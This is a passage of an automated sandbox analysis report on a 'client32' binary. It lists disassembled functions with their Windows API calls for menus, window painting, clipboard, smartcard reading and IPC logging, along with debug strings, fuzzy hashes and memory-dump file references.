Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: BeepCountTick__wcstoi64
String ID: *SoundWhileViewed$BeepWhileViewed$Client
API String ID: 666309045-3409951188
Opcode ID: d920f05703bcd11949c8e46f564084d737ad2e5f5d74a240adc2f0c53d488819
Instruction ID: 88fc7c2c2ff2b611e8e8a37401301b3f6159e5831b8fa70f0dc415b1a958c5df
Opcode Fuzzy Hash: d920f05703bcd11949c8e46f564084d737ad2e5f5d74a240adc2f0c53d488819
Instruction Fuzzy Hash: 56417B36A1C6616BD7518A608D84BDFFB298F5B718FB04264EC6897180FF30E941CB51

Function 11015410 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 113COMMON

Download Yara Rule

APIs

SetPropA.USER32(?,?), ref: 1101547F

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Part of subcall function 11015190: BeginPaint.USER32(?,?), ref: 110151BF
Part of subcall function 11015190: GetWindowRect.USER32(00000000,?), ref: 110151EC
Part of subcall function 11015190: _memset.LIBCMT ref: 110151FA
Part of subcall function 11015190: CreateFontIndirectA.GDI32(?), ref: 11015216
Part of subcall function 11015190: SelectObject.GDI32(00000000,00000000), ref: 1101522A
Part of subcall function 11015190: SetBkMode.GDI32(00000000,00000001), ref: 11015235
Part of subcall function 11015190: BeginPath.GDI32(00000000), ref: 11015242
Part of subcall function 11015190: TextOutA.GDI32(00000000,00000000,00000000), ref: 11015260
Part of subcall function 11015190: EndPath.GDI32(00000000), ref: 11015267
Part of subcall function 11015190: PathToRegion.GDI32(00000000), ref: 1101526E
Part of subcall function 11015190: CreateSolidBrush.GDI32(?), ref: 11015280
Part of subcall function 11015190: CreateSolidBrush.GDI32(?), ref: 11015296
Part of subcall function 11015190: CreatePen.GDI32(00000000,00000002,?), ref: 110152B0
Part of subcall function 11015190: SelectObject.GDI32(00000000,00000000), ref: 110152BE
Part of subcall function 11015190: SelectObject.GDI32(00000000,?), ref: 110152CE

GetPropA.USER32(?), ref: 1101548E
wsprintfA.USER32 ref: 110154C3
RemovePropA.USER32(?), ref: 110154F8
DefWindowProcA.USER32(?,?,?,?), ref: 11015521

Strings

..\ctl32\NSMIdentifyWnd.cpp, xrefs: 11015445, 11015463, 110154D3
hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x, xrefs: 110154BD
NSMIdentifyWnd::m_aProp, xrefs: 11015468

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Create$ObjectPathPropSelect$BeginBrushSolidWindowwsprintf$ErrorExitFontIndirectLastMessageModePaintProcProcessRectRegionRemoveText_memset
String ID: ..\ctl32\NSMIdentifyWnd.cpp$NSMIdentifyWnd::m_aProp$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
API String ID: 1924375018-841114059
Opcode ID: ec3e1234084b3d82126ba732f157090ad2e44ab0648003b83a7f936b10213f93
Instruction ID: 2915d23f9928799d524ed0ec110504297751baa3e875027ded2e10bedea347e8
Opcode Fuzzy Hash: ec3e1234084b3d82126ba732f157090ad2e44ab0648003b83a7f936b10213f93
Instruction Fuzzy Hash: 9531A976E01125ABDB11CF94DC84FAEB7A8FF4A319F04816AF9069F144EB359940CB61

Function 1103F210 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 105COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 1103F27C
_malloc.LIBCMT ref: 1103F29A

Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616

GetLastError.KERNEL32 ref: 1103F30C
_free.LIBCMT ref: 1103F321

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

transferred == datalen, xrefs: 1103F2DE
CLTCONN.CPP, xrefs: 1103F2D9
Read %u bytes from smartcard device, xrefs: 1103F2EF
Error %d reading from smartcard device, xrefs: 1103F313

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$AllocateExitHeapMessageProcess_free_mallocwsprintf
String ID: CLTCONN.CPP$Error %d reading from smartcard device$Read %u bytes from smartcard device$transferred == datalen
API String ID: 492257515-1619960733
Opcode ID: 422f7a88f4e2a70949c983959588ddbb49813984de6ff3b85734e79f8ab640e3
Instruction ID: 5c0ce5a60e48b42dacdb937ef0d5d9348949da67155b38d00fc4e8c999954ed4
Opcode Fuzzy Hash: 422f7a88f4e2a70949c983959588ddbb49813984de6ff3b85734e79f8ab640e3
Instruction Fuzzy Hash: EA3190B5E0050AAFCB00DF98DC80EAFF7B9FB89714F544559E915A3380E731A9048BA2

Function 11005170 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 1100517E
_memset.LIBCMT ref: 110051A0
GetMenuItemID.USER32(?,00000000), ref: 110051B4
CheckMenuItem.USER32(?,00000000,00000000), ref: 11005211
EnableMenuItem.USER32(?,00000000,00000000), ref: 11005227
GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005248
SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005274

Strings

0, xrefs: 110051AD

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemMenu$Info$CheckCountEnable_memset
String ID: 0
API String ID: 2755257978-4108050209
Opcode ID: 49b977d40c07f5e2c66648d899f03e2c19a34532f2eedabc1b5daecf0946c252
Instruction ID: 6013c0d9d1bdd2596c58563bf639684a5b16c11bd1ef64a9a4ff28934d00860a
Opcode Fuzzy Hash: 49b977d40c07f5e2c66648d899f03e2c19a34532f2eedabc1b5daecf0946c252
Instruction Fuzzy Hash: 71316E71D01219AFEB01DFA4D885BEEBBFCEF4A798F008059F941A6240E7B59944CB60

Function 110311D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 97registryclipboardCOMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1103122A
_memset.LIBCMT ref: 11031261
RegisterClipboardFormatA.USER32(?), ref: 11031289
GetLastError.KERNEL32 ref: 11031294

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

_memmove.LIBCMT ref: 110312DE

Strings

(*ppClipData)->pData, xrefs: 11031248
..\ctl32\clipbrd.cpp, xrefs: 11031208, 11031243
!*ppClipData, xrefs: 1103120D

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$ClipboardExitFormatMessageProcessRegister_malloc_memmove_memsetwsprintf
String ID: !*ppClipData$(*ppClipData)->pData$..\ctl32\clipbrd.cpp
API String ID: 2414640225-228067302
Opcode ID: 011fb0df3c7920a32f34a83fa9d8f7a137a91745eee1d129c030abf864f7ab63
Instruction ID: 14e8dd57a7feced4d25e4c3e85cd85d2286920d3da7b542c8ccc3d839dc859fc
Opcode Fuzzy Hash: 011fb0df3c7920a32f34a83fa9d8f7a137a91745eee1d129c030abf864f7ab63
Instruction Fuzzy Hash: 44318DB9A00706ABD714DF64C881F6AF3B4FF89708F14C558E9598B340EB70EA54CBA0

Function 110B1410 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 110B1448
EnableWindow.USER32(00000000,00000000), ref: 110B1483
EnableWindow.USER32(00000000,00000000), ref: 110B14AD
EnableWindow.USER32(00000000,00000000), ref: 110B14DD
EnableWindow.USER32(?,00000000), ref: 110B14E4
EnableMenuItem.USER32(110B689C,00000000,00000002), ref: 110B14FE

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110B1432, 110B1466, 110B1493, 110B14C3
m_hWnd, xrefs: 110B1437, 110B146B, 110B1498, 110B14C8

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Enable$Window$Menu$ErrorExitItemLastMessageProcesswsprintf
String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 703148351-1557312927
Opcode ID: 3c57b5d810544df76335c1307041a00c7c7120df7f96d05c297ab18d3a0fa9b2
Instruction ID: c715c16d4c75479b9699dac4ef5c5b91c87fbe03cd8a25a8d52e0fd67f325f0a
Opcode Fuzzy Hash: 3c57b5d810544df76335c1307041a00c7c7120df7f96d05c297ab18d3a0fa9b2
Instruction Fuzzy Hash: 5021F675F40612BBC315DB75DC84FDAFBA5BF45218F048128EA085B181EB34A851CBE5

Function 11025740 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 94sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000032), ref: 110257E9
GetTickCount.KERNEL32 ref: 110257F7
GetTickCount.KERNEL32 ref: 11025807

Strings

IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11025779
Warning. IPC msg but no wnd. Waiting..., xrefs: 110257BF
IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11025798
HandleIPC ret %x, took %d ms, xrefs: 11025810
Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11025827

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$Sleep
String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
API String ID: 4250438611-314227603
Opcode ID: f0b4fd3c98b5580777bb38eafbc8a38d8b1eb00d735c0e8546a73c597d21ad9a
Instruction ID: 856ebef11915e97a845ae59ce9eeaf6af0a263cab1a7eb4eff15662075c9ff21
Opcode Fuzzy Hash: f0b4fd3c98b5580777bb38eafbc8a38d8b1eb00d735c0e8546a73c597d21ad9a
Instruction Fuzzy Hash: FA21E6BAE11514AFD710CE59ECC4EABB3EDEBC8368F408529EC4A83244D531AC40DBA5

Function 111339A0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 111339BD
_memset.LIBCMT ref: 111339DE
GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 11133A1B
CreatePopupMenu.USER32 ref: 11133A2A
GetMenuItemCount.USER32(?), ref: 11133A53
InsertMenuItemA.USER32(?,00000000,00000001,00000030), ref: 11133A64
GetMenuItemCount.USER32(?), ref: 11133A6B

Strings

0, xrefs: 111339F7

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
String ID: 0
API String ID: 74472576-4108050209
Opcode ID: 7719ae794c5f4ac1d3e1b3afcbe28cf16263814d2f920018c1cde043e95985ad
Instruction ID: 1b986c140fd3c586e62bf356606ee5cacbc28781d9d9467d2f53e951488c2325
Opcode Fuzzy Hash: 7719ae794c5f4ac1d3e1b3afcbe28cf16263814d2f920018c1cde043e95985ad
Instruction Fuzzy Hash: 02218075D10228AFDB119F50CCC9BEEF7B8EB49719F0080E9E549A6244DBB05B84CF90

Function 1110B730 Relevance: 13.7, APIs: 9, Instructions: 156COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 1110B7AA
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 1110B7BC
GetSystemMetrics.USER32(00000002), ref: 1110B7CA
GetSystemMetrics.USER32(00000003), ref: 1110B7DF
GetSystemMetrics.USER32(0000004E), ref: 1110B829
GetSystemMetrics.USER32(0000004F), ref: 1110B833
GetSystemMetrics.USER32(00000000), ref: 1110B846
GetSystemMetrics.USER32(00000001), ref: 1110B859
GetWindowRect.USER32(?,?), ref: 1110B8C6

Part of subcall function 1108E4D0: GetSystemMetrics.USER32(0000004C), ref: 1108E4DE
Part of subcall function 1108E4D0: GetSystemMetrics.USER32(0000004D), ref: 1108E4E7
Part of subcall function 1108E4D0: GetSystemMetrics.USER32(0000004E), ref: 1108E4EE
Part of subcall function 1108E4D0: GetSystemMetrics.USER32(00000000), ref: 1108E4F7
Part of subcall function 1108E4D0: GetSystemMetrics.USER32(0000004F), ref: 1108E4FD
Part of subcall function 1108E4D0: GetSystemMetrics.USER32(00000001), ref: 1108E505

Part of subcall function 1108E460: _memset.LIBCMT ref: 1108E48F
Part of subcall function 1108E460: FreeLibrary.KERNEL32(00000000,?,75A84920,1110B942,00000002), ref: 1108E49A

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MetricsSystem$Window$Rect$FreeLibraryPoints_memset
String ID:
API String ID: 314733930-0
Opcode ID: d7eadc563fd8f1edf11073224b815364cadfebc45bd2c66acbb8496d4c6402ae
Instruction ID: 2a0a03e10d028b360f6a22ee55a987c1a255e6312d7f70e3124523d6712918fa
Opcode Fuzzy Hash: d7eadc563fd8f1edf11073224b815364cadfebc45bd2c66acbb8496d4c6402ae
Instruction Fuzzy Hash: 2C610B75D0066A9FDB14CF68C984BEDF7F4FB48704F0045AAD91AA7284DB70AA84CF90

Function 110419D0 Relevance: 13.6, APIs: 9, Instructions: 99COMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32(?,0000046F), ref: 11041A07
IsDlgButtonChecked.USER32(?,00000470), ref: 11041A1A
DestroyCursor.USER32(?), ref: 11041A94
DestroyCursor.USER32(?), ref: 11041A9D
DestroyCursor.USER32(00000000), ref: 11041AB7

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CursorDestroy$ButtonChecked
String ID:
API String ID: 2664327029-0
Opcode ID: d14e40222c2addaa46bb5aeb157921d5622c950265ecc17fd31c94f47afcce01
Instruction ID: 1323783ba67479ab496a98caa9c218dfb57703e27d56f793037b71eb19725e60
Opcode Fuzzy Hash: d14e40222c2addaa46bb5aeb157921d5622c950265ecc17fd31c94f47afcce01
Instruction Fuzzy Hash: AC31B1B6B047019BE310DA79CCC0F5B73D8AB84744F118939EA65CB680DB75F951CB60

Function 110C3120 Relevance: 13.6, APIs: 9, Instructions: 89windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11102BC0: GetCurrentThreadId.KERNEL32 ref: 11102BCE
Part of subcall function 11102BC0: EnterCriticalSection.KERNEL32(00000000,75A73760,00000000,111DBD28,?,110C3135,00000000,75A73760), ref: 11102BD8
Part of subcall function 11102BC0: LeaveCriticalSection.KERNEL32(00000000,75A8A1D0,00000000,?,110C3135,00000000,75A73760), ref: 11102BF8

EnterCriticalSection.KERNEL32(00000000,00000000,75A73760,00000000,75A8A1D0,1105952B,?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C313B
SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110C3168
SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110C317A
LeaveCriticalSection.KERNEL32(?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C3184
IsDialogMessageA.USER32(00000000,?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C319B
LeaveCriticalSection.KERNEL32(00000000,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C31B1
DestroyWindow.USER32(00000000,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C31C1
LeaveCriticalSection.KERNEL32(?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C31CB
LeaveCriticalSection.KERNEL32(?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C31E1

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
